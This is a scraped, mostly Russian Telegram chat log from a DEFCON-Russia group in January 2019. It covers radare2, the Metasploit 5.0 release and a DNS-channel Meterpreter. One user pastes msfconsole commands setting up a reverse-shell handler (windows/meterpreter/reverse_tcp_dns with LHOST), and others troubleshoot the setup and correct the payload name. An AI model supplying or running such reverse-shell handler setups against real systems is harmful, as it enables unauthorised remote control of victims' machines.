Size: a a a

DCG#7812 DEFCON-RUSSIA

2019 January 10

PD

Peter Destructive in DCG#7812 DEFCON-RUSSIA
Black Duck
Ты в pt?
нет, в ртк
источник

d

dukeBarman in DCG#7812 DEFCON-RUSSIA
Разработчики opensource фреймворка radare2 сделали опрос с целью выслушать идеи на чем стоит сконцетрироваться, что улучшить и т.п.  https://docs.google.com/forms/d/e/1FAIpQLScE9j9k18svYAj6fgqyswpRy8W3YImBPe-Pxzp1YStv5G_GOA/viewform
источник

VR

Vlad Roskov in DCG#7812 DEFCON-RUSSIA
https://img.vos.uz/s8fggg8v.png охуенно :D такой радар
источник

d

dukeBarman in DCG#7812 DEFCON-RUSSIA
в feedback если что пиши :)
источник

JG

JeisonWi Garrison in DCG#7812 DEFCON-RUSSIA
Vlad Roskov
https://img.vos.uz/s8fggg8v.png охуенно :D такой радар
И?
источник

VR

Vlad Roskov in DCG#7812 DEFCON-RUSSIA
Да прост каждый раз радует)
источник

VR

Vlad Roskov in DCG#7812 DEFCON-RUSSIA
Это как, which opcode feels more natural for ret instruction?
AF, 37, C3, 02
источник
2019 January 11

D

Danila in DCG#7812 DEFCON-RUSSIA
https://blog.rapid7.com/2019/01/10/metasploit-framework-5-0-released/
chapter "Get it (and improve it)"

https://github.com/rapid7/metasploit-framework/wiki/Writing-External-Python-Modules

Возможно это поможет релизнуть в 5 мсф днс канальный метерпретер
источник

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
интересно, но модуля на питоне не достаточно, так как  нам хэндлер надо.. но может и это будет возможно, и тогда да
источник

NK

ID:712970320 in DCG#7812 DEFCON-RUSSIA
Всем ку. Хандлер выдает ошибку
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_dns
payload => windows/meterpreter/reverse_tcp_dns
msf5 exploit(multi/handler) > set LHOST xx.x.xxx.xxx
LHOST => xx.x.xxx.xxx
msf5 exploit(multi/handler) > run

[-] Handler failed to bind to xx.x.xxx.xxx:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444

Сам пейлоад стучится в днс, а вот хандлить не выходит.
2019-01-11 20:50:44,015 MSFListener              INFO     Incoming connection from address ('yyy.yy.yyy.yyy', 55700)

На сервере с мсф фаервол отключен. На днс сервере 4444 и 53 порты открыты.
В чем может быть проблема?
источник

NT

Nikita Tikhomirov in DCG#7812 DEFCON-RUSSIA
LHOST это же твой ip
источник

NT

Nikita Tikhomirov in DCG#7812 DEFCON-RUSSIA
Нет?
источник

NK

ID:712970320 in DCG#7812 DEFCON-RUSSIA
Nikita Tikhomirov
LHOST это же твой ip
В гайдах из гугла и ютуба туда указывают айпи днс сервера, вроде как.
источник

NT

Nikita Tikhomirov in DCG#7812 DEFCON-RUSSIA
RHOST?
источник

NT

Nikita Tikhomirov in DCG#7812 DEFCON-RUSSIA
Хотя я могу ошибаться
источник

NK

ID:712970320 in DCG#7812 DEFCON-RUSSIA
Сейчас попробую.
источник

NT

Nikita Tikhomirov in DCG#7812 DEFCON-RUSSIA
Да lhost это листенер
источник

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
bind
источник

AS

Alexey Sintsov in DCG#7812 DEFCON-RUSSIA
пишет же
источник

m🎃

max3raza 🎃 in DCG#7812 DEFCON-RUSSIA
ID:712970320
Всем ку. Хандлер выдает ошибку
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp_dns
payload => windows/meterpreter/reverse_tcp_dns
msf5 exploit(multi/handler) > set LHOST xx.x.xxx.xxx
LHOST => xx.x.xxx.xxx
msf5 exploit(multi/handler) > run

[-] Handler failed to bind to xx.x.xxx.xxx:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444

Сам пейлоад стучится в днс, а вот хандлить не выходит.
2019-01-11 20:50:44,015 MSFListener              INFO     Incoming connection from address ('yyy.yy.yyy.yyy', 55700)

На сервере с мсф фаервол отключен. На днс сервере 4444 и 53 порты открыты.
В чем может быть проблема?
windows/meterpreter/reverse_dns , а не windows/meterpreter/reverse_tcp_dns
источник